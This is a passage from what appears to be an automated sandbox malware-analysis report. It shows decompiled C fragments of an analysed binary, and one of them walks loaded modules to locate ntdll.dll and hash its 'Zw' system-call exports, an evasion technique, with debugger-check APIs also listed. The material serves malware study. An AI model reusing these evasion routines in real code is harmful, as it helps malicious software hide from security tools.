                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 0386ff7910fe616fac398afec395da2ff59fff3b69dcdda953c01dfa6e666739
                                                                                                                                                                                                                                                                                          • Instruction ID: 56366e4e2cf26ffe87a7f3428ee3e031056d0c5830fccfd7986f72adb9105542
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0386ff7910fe616fac398afec395da2ff59fff3b69dcdda953c01dfa6e666739
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C21BAB4805304EFD7A6DFE9ED49A853BB8BB4C311F50911AE84C86AB0E7B069C0CF01
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                          			E000F4890(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v156;
                                                                                                                                                                                                                                                                                          				signed int _t9;
                                                                                                                                                                                                                                                                                          				intOrPtr _t16;
                                                                                                                                                                                                                                                                                          				intOrPtr _t19;
                                                                                                                                                                                                                                                                                          				intOrPtr _t25;
                                                                                                                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                                                                                                                          				intOrPtr _t27;
                                                                                                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t27 = __esi;
                                                                                                                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                                                                                                                          				_t19 = __ebx;
                                                                                                                                                                                                                                                                                          				_t9 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                                                                          				E00106820( &(_v156.dwMajorVersion), 0, 0x90);
                                                                                                                                                                                                                                                                                          				_v156.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                                                          				if(GetVersionExA( &_v156) == 0) {
                                                                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                                                                          					return E001059E6(1, _t19, _v8 ^ _t28, _t25, _t26, _t27);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t16 = _v156.dwMajorVersion;
                                                                                                                                                                                                                                                                                          					if(_t16 >= 5 || _t16 == 4 && _v156.dwMinorVersion >= 0x5a) {
                                                                                                                                                                                                                                                                                          						return E001059E6(0, _t19, _v8 ^ _t28, _t25, _t26, _t27);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                                          0x000f4890
                                                                                                                                                                                                                                                                                          0x000f4890
                                                                                                                                                                                                                                                                                          0x000f4890
                                                                                                                                                                                                                                                                                          0x000f4899
                                                                                                                                                                                                                                                                                          0x000f48a0
                                                                                                                                                                                                                                                                                          0x000f48b1
                                                                                                                                                                                                                                                                                          0x000f48c0
                                                                                                                                                                                                                                                                                          0x000f48d2
                                                                                                                                                                                                                                                                                          0x000f48fd
                                                                                                                                                                                                                                                                                          0x000f490f
                                                                                                                                                                                                                                                                                          0x000f48d4
                                                                                                                                                                                                                                                                                          0x000f48d4
                                                                                                                                                                                                                                                                                          0x000f48dd
                                                                                                                                                                                                                                                                                          0x000f48fc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f48dd

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Version_memset
                                                                                                                                                                                                                                                                                          • String ID: Z
                                                                                                                                                                                                                                                                                          • API String ID: 963298953-1505515367
                                                                                                                                                                                                                                                                                          • Opcode ID: a376e3908cc99b8cb58e7862137f39cad418debde0a7be0acae1c013dcfc15dc
                                                                                                                                                                                                                                                                                          • Instruction ID: 3155eaa4a04d54eff710e49a4e6832bb3ef068aa2d619fc6c57af41ab7b1c5e5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a376e3908cc99b8cb58e7862137f39cad418debde0a7be0acae1c013dcfc15dc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33F0A430A0020C9BDB60DB74ED46B6EB3F5DB15714F4000A9EA0ED6682DF709E89DB81
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                                                                                                                                                                          			E001054F5(void* __eflags) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v0;
                                                                                                                                                                                                                                                                                          				intOrPtr _t3;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				0;
                                                                                                                                                                                                                                                                                          				E00104820(__eflags, 0xf516e1fb);
                                                                                                                                                                                                                                                                                          				_t3 =  *0x170c00; // 0x0
                                                                                                                                                                                                                                                                                          				_push(_v0);
                                                                                                                                                                                                                                                                                          				if(_t3 != 1) {
                                                                                                                                                                                                                                                                                          					__imp__InterlockedPushEntrySList(_t3);
                                                                                                                                                                                                                                                                                          					return _t3;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return HeapFree(GetProcessHeap(), 0, ??);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                                                                          0x00105500
                                                                                                                                                                                                                                                                                          0x00105504
                                                                                                                                                                                                                                                                                          0x00105508
                                                                                                                                                                                                                                                                                          0x0010550c
                                                                                                                                                                                                                                                                                          0x00105510
                                                                                                                                                                                                                                                                                          0x00105514
                                                                                                                                                                                                                                                                                          0x00105518
                                                                                                                                                                                                                                                                                          0x0010551c
                                                                                                                                                                                                                                                                                          0x00105520
                                                                                                                                                                                                                                                                                          0x00105524
                                                                                                                                                                                                                                                                                          0x00105528
                                                                                                                                                                                                                                                                                          0x0010552c
                                                                                                                                                                                                                                                                                          0x00105530
                                                                                                                                                                                                                                                                                          0x00105534
                                                                                                                                                                                                                                                                                          0x00105538
                                                                                                                                                                                                                                                                                          0x0010553c
                                                                                                                                                                                                                                                                                          0x00105540
                                                                                                                                                                                                                                                                                          0x00105544
                                                                                                                                                                                                                                                                                          0x00105548
                                                                                                                                                                                                                                                                                          0x0010554c
                                                                                                                                                                                                                                                                                          0x00105550
                                                                                                                                                                                                                                                                                          0x00105554
                                                                                                                                                                                                                                                                                          0x00105558
                                                                                                                                                                                                                                                                                          0x0010555c
                                                                                                                                                                                                                                                                                          0x00105560
                                                                                                                                                                                                                                                                                          0x00105564
                                                                                                                                                                                                                                                                                          0x00105568
                                                                                                                                                                                                                                                                                          0x0010556c
                                                                                                                                                                                                                                                                                          0x00105570
                                                                                                                                                                                                                                                                                          0x00105574
                                                                                                                                                                                                                                                                                          0x00105578
                                                                                                                                                                                                                                                                                          0x0010557c
                                                                                                                                                                                                                                                                                          0x00105580
                                                                                                                                                                                                                                                                                          0x00105584
                                                                                                                                                                                                                                                                                          0x00105588
                                                                                                                                                                                                                                                                                          0x0010558c
                                                                                                                                                                                                                                                                                          0x00105590
                                                                                                                                                                                                                                                                                          0x00105594
                                                                                                                                                                                                                                                                                          0x00105598
                                                                                                                                                                                                                                                                                          0x0010559c
                                                                                                                                                                                                                                                                                          0x001055a0
                                                                                                                                                                                                                                                                                          0x001055a4
                                                                                                                                                                                                                                                                                          0x001055a8
                                                                                                                                                                                                                                                                                          0x001055ac
                                                                                                                                                                                                                                                                                          0x001055b0
                                                                                                                                                                                                                                                                                          0x001055b4
                                                                                                                                                                                                                                                                                          0x001055b8
                                                                                                                                                                                                                                                                                          0x001055bc
                                                                                                                                                                                                                                                                                          0x001055c0
                                                                                                                                                                                                                                                                                          0x001055c4
                                                                                                                                                                                                                                                                                          0x001055c8
                                                                                                                                                                                                                                                                                          0x001055cc
                                                                                                                                                                                                                                                                                          0x001055d0
                                                                                                                                                                                                                                                                                          0x001055d4
                                                                                                                                                                                                                                                                                          0x001055d8
                                                                                                                                                                                                                                                                                          0x001055dc
                                                                                                                                                                                                                                                                                          0x001055e0
                                                                                                                                                                                                                                                                                          0x001055e4
                                                                                                                                                                                                                                                                                          0x001055e8
                                                                                                                                                                                                                                                                                          0x001055ec
                                                                                                                                                                                                                                                                                          0x001055f0
                                                                                                                                                                                                                                                                                          0x001055f4
                                                                                                                                                                                                                                                                                          0x001055f8
                                                                                                                                                                                                                                                                                          0x001055fc
                                                                                                                                                                                                                                                                                          0x00105600
                                                                                                                                                                                                                                                                                          0x00105604
                                                                                                                                                                                                                                                                                          0x00105608
                                                                                                                                                                                                                                                                                          0x0010560c
                                                                                                                                                                                                                                                                                          0x00105610
                                                                                                                                                                                                                                                                                          0x00105614
                                                                                                                                                                                                                                                                                          0x00105618
                                                                                                                                                                                                                                                                                          0x0010561c
                                                                                                                                                                                                                                                                                          0x00105620
                                                                                                                                                                                                                                                                                          0x00105624
                                                                                                                                                                                                                                                                                          0x00105628
                                                                                                                                                                                                                                                                                          0x0010562c
                                                                                                                                                                                                                                                                                          0x00105630
                                                                                                                                                                                                                                                                                          0x00105634
                                                                                                                                                                                                                                                                                          0x00105638
                                                                                                                                                                                                                                                                                          0x0010563c
                                                                                                                                                                                                                                                                                          0x00105640
                                                                                                                                                                                                                                                                                          0x00105644
                                                                                                                                                                                                                                                                                          0x00105648
                                                                                                                                                                                                                                                                                          0x0010564c
                                                                                                                                                                                                                                                                                          0x00105650
                                                                                                                                                                                                                                                                                          0x00105654
                                                                                                                                                                                                                                                                                          0x00105658
                                                                                                                                                                                                                                                                                          0x0010565c
                                                                                                                                                                                                                                                                                          0x00105660
                                                                                                                                                                                                                                                                                          0x00105662
                                                                                                                                                                                                                                                                                          0x0010566c
                                                                                                                                                                                                                                                                                          0x00105671
                                                                                                                                                                                                                                                                                          0x00105677
                                                                                                                                                                                                                                                                                          0x0010568b
                                                                                                                                                                                                                                                                                          0x00105692
                                                                                                                                                                                                                                                                                          0x00105679
                                                                                                                                                                                                                                                                                          0x00105689
                                                                                                                                                                                                                                                                                          0x00105689

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,0010570E,?,?,000F5733,?), ref: 0010567B
                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,0010570E,?,?,000F5733,?), ref: 00105682
                                                                                                                                                                                                                                                                                          • InterlockedPushEntrySList.KERNEL32(00000000,?,?,0010570E,?,?,000F5733,?), ref: 0010568B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Heap$EntryFreeInterlockedListProcessPush
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1982578398-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c8e842ee0e4aecfb9199cf7031ac9db65b466bd6c18161637172131428d98090
                                                                                                                                                                                                                                                                                          • Instruction ID: ea8fba95b68a91d3a85204cf6dafa7e5d75efe79d9504aae7f6a6ba645b11132
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8e842ee0e4aecfb9199cf7031ac9db65b466bd6c18161637172131428d98090
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3D0A731440204B7CF0117D4BD48E573759E759312F104501F60886450CFB1D5C08A80
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                                                                                                                          			E00104660() {
                                                                                                                                                                                                                                                                                          				intOrPtr* _v8;
                                                                                                                                                                                                                                                                                          				signed short* _v12;
                                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                                                                                                          				signed short* _t60;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t62;
                                                                                                                                                                                                                                                                                          				signed int _t67;
                                                                                                                                                                                                                                                                                          				intOrPtr _t71;
                                                                                                                                                                                                                                                                                          				intOrPtr _t73;
                                                                                                                                                                                                                                                                                          				intOrPtr _t79;
                                                                                                                                                                                                                                                                                          				signed int _t83;
                                                                                                                                                                                                                                                                                          				intOrPtr _t85;
                                                                                                                                                                                                                                                                                          				intOrPtr _t89;
                                                                                                                                                                                                                                                                                          				intOrPtr _t94;
                                                                                                                                                                                                                                                                                          				intOrPtr _t100;
                                                                                                                                                                                                                                                                                          				signed int _t101;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t107;
                                                                                                                                                                                                                                                                                          				signed int _t109;
                                                                                                                                                                                                                                                                                          				void* _t111;
                                                                                                                                                                                                                                                                                          				signed int _t112;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				if( *0x15ae08 == 0) {
                                                                                                                                                                                                                                                                                          					_t107 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
                                                                                                                                                                                                                                                                                          					_t71 =  *((intOrPtr*)(_t107 + 0x18));
                                                                                                                                                                                                                                                                                          					_t53 = 0;
                                                                                                                                                                                                                                                                                          					if(_t71 == 0) {
                                                                                                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						do {
                                                                                                                                                                                                                                                                                          							_t89 = _t71;
                                                                                                                                                                                                                                                                                          							_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t89 + 0x3c)) + _t89 + 0x78));
                                                                                                                                                                                                                                                                                          							if(_t73 == 0) {
                                                                                                                                                                                                                                                                                          								goto L6;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t53 = _t73 + _t89;
                                                                                                                                                                                                                                                                                          								_t85 =  *((intOrPtr*)(_t53 + 0xc));
                                                                                                                                                                                                                                                                                          								if(( *(_t85 + _t89) | 0x20202020) != 0x6c64746e || ( *(_t85 + _t89 + 4) | 0x20202020) != 0x6c642e6c) {
                                                                                                                                                                                                                                                                                          									goto L6;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                                                                                                          							_t107 =  *_t107;
                                                                                                                                                                                                                                                                                          							_t71 =  *((intOrPtr*)(_t107 + 0x18));
                                                                                                                                                                                                                                                                                          						} while (_t71 != 0);
                                                                                                                                                                                                                                                                                          						if(_t53 != 0) {
                                                                                                                                                                                                                                                                                          							_t109 =  *(_t53 + 0x18);
                                                                                                                                                                                                                                                                                          							_t100 =  *((intOrPtr*)(_t53 + 0x1c)) + _t89;
                                                                                                                                                                                                                                                                                          							_v16 = _t109;
                                                                                                                                                                                                                                                                                          							_v20 = _t100;
                                                                                                                                                                                                                                                                                          							_t67 = 0;
                                                                                                                                                                                                                                                                                          							_v12 =  *((intOrPtr*)(_t53 + 0x24)) + _t89 + _t109 * 2 - 2;
                                                                                                                                                                                                                                                                                          							_v8 =  *((intOrPtr*)(_t53 + 0x20)) + _t89 + _t109 * 4 - 4;
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								_t60 =  *_v8 + _t89;
                                                                                                                                                                                                                                                                                          								if( *_t60 != 0x775a) {
                                                                                                                                                                                                                                                                                          									goto L16;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t83 = 0xf1171612;
                                                                                                                                                                                                                                                                                          									if( *_t60 != 0) {
                                                                                                                                                                                                                                                                                          										do {
                                                                                                                                                                                                                                                                                          											_t112 =  *_t60 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          											_t60 =  &(_t60[0]);
                                                                                                                                                                                                                                                                                          											asm("ror edi, 0x8");
                                                                                                                                                                                                                                                                                          											_t83 = _t83 ^ _t83 + _t112;
                                                                                                                                                                                                                                                                                          										} while ( *_t60 != 0);
                                                                                                                                                                                                                                                                                          										_t100 = _v20;
                                                                                                                                                                                                                                                                                          										_t109 = _v16;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									 *(0x15ae0c + _t67 * 8) = _t83;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(0x15ae10 + _t67 * 8)) =  *((intOrPtr*)(_t100 + ( *_v12 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                                                          									_t67 = _t67 + 1;
                                                                                                                                                                                                                                                                                          									if(_t67 != 0x1f4) {
                                                                                                                                                                                                                                                                                          										goto L16;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                                          								L16:
                                                                                                                                                                                                                                                                                          								_v8 = _v8 - 4;
                                                                                                                                                                                                                                                                                          								_v12 = _v12 - 2;
                                                                                                                                                                                                                                                                                          								_t109 = _t109 - 1;
                                                                                                                                                                                                                                                                                          								_v16 = _t109;
                                                                                                                                                                                                                                                                                          							} while (_t109 != 0);
                                                                                                                                                                                                                                                                                          							_t101 = 0;
                                                                                                                                                                                                                                                                                          							_t42 = _t67 - 1; // 0x0
                                                                                                                                                                                                                                                                                          							 *0x15ae08 = _t67;
                                                                                                                                                                                                                                                                                          							_v16 = 0;
                                                                                                                                                                                                                                                                                          							if(_t42 != 0) {
                                                                                                                                                                                                                                                                                          								do {
                                                                                                                                                                                                                                                                                          									_t111 = 0;
                                                                                                                                                                                                                                                                                          									if(_t67 - _t101 != 1) {
                                                                                                                                                                                                                                                                                          										_t62 = 0x15ae10;
                                                                                                                                                                                                                                                                                          										do {
                                                                                                                                                                                                                                                                                          											_t79 =  *_t62;
                                                                                                                                                                                                                                                                                          											_t44 = _t62 + 8; // 0x694f0
                                                                                                                                                                                                                                                                                          											_t94 =  *_t44;
                                                                                                                                                                                                                                                                                          											if(_t79 > _t94) {
                                                                                                                                                                                                                                                                                          												_t45 = _t62 - 4; // 0xcc551765
                                                                                                                                                                                                                                                                                          												_t46 = _t62 + 4; // 0x812baf9d
                                                                                                                                                                                                                                                                                          												 *((intOrPtr*)(_t62 + 4)) =  *_t45;
                                                                                                                                                                                                                                                                                          												_t101 = _v16;
                                                                                                                                                                                                                                                                                          												 *((intOrPtr*)(_t62 - 4)) =  *_t46;
                                                                                                                                                                                                                                                                                          												 *_t62 = _t94;
                                                                                                                                                                                                                                                                                          												 *((intOrPtr*)(_t62 + 8)) = _t79;
                                                                                                                                                                                                                                                                                          												_t67 =  *0x15ae08; // 0x1e1
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t111 = _t111 + 1;
                                                                                                                                                                                                                                                                                          											_t62 = _t62 + 8;
                                                                                                                                                                                                                                                                                          										} while (_t111 < _t67 - _t101 - 1);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t101 = _t101 + 1;
                                                                                                                                                                                                                                                                                          									_t51 = _t67 - 1; // -1
                                                                                                                                                                                                                                                                                          									_v16 = _t101;
                                                                                                                                                                                                                                                                                          								} while (_t101 < _t51);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                                          0x0010466d
                                                                                                                                                                                                                                                                                          0x00104683
                                                                                                                                                                                                                                                                                          0x00104686
                                                                                                                                                                                                                                                                                          0x00104689
                                                                                                                                                                                                                                                                                          0x0010468e
                                                                                                                                                                                                                                                                                          0x001046d3
                                                                                                                                                                                                                                                                                          0x001046da
                                                                                                                                                                                                                                                                                          0x00104690
                                                                                                                                                                                                                                                                                          0x00104690
                                                                                                                                                                                                                                                                                          0x00104690
                                                                                                                                                                                                                                                                                          0x00104695
                                                                                                                                                                                                                                                                                          0x0010469b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010469d
                                                                                                                                                                                                                                                                                          0x0010469d
                                                                                                                                                                                                                                                                                          0x001046a0
                                                                                                                                                                                                                                                                                          0x001046b2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001046b2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001046c6
                                                                                                                                                                                                                                                                                          0x001046c6
                                                                                                                                                                                                                                                                                          0x001046c8
                                                                                                                                                                                                                                                                                          0x001046cb
                                                                                                                                                                                                                                                                                          0x001046d1
                                                                                                                                                                                                                                                                                          0x001046db
                                                                                                                                                                                                                                                                                          0x001046eb
                                                                                                                                                                                                                                                                                          0x001046f6
                                                                                                                                                                                                                                                                                          0x001046f9
                                                                                                                                                                                                                                                                                          0x001046fc
                                                                                                                                                                                                                                                                                          0x001046fe
                                                                                                                                                                                                                                                                                          0x00104701
                                                                                                                                                                                                                                                                                          0x00104704
                                                                                                                                                                                                                                                                                          0x00104709
                                                                                                                                                                                                                                                                                          0x00104713
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00104715
                                                                                                                                                                                                                                                                                          0x00104718
                                                                                                                                                                                                                                                                                          0x0010471d
                                                                                                                                                                                                                                                                                          0x00104720
                                                                                                                                                                                                                                                                                          0x00104720
                                                                                                                                                                                                                                                                                          0x00104725
                                                                                                                                                                                                                                                                                          0x00104726
                                                                                                                                                                                                                                                                                          0x0010472b
                                                                                                                                                                                                                                                                                          0x0010472d
                                                                                                                                                                                                                                                                                          0x00104732
                                                                                                                                                                                                                                                                                          0x00104735
                                                                                                                                                                                                                                                                                          0x00104735
                                                                                                                                                                                                                                                                                          0x0010473b
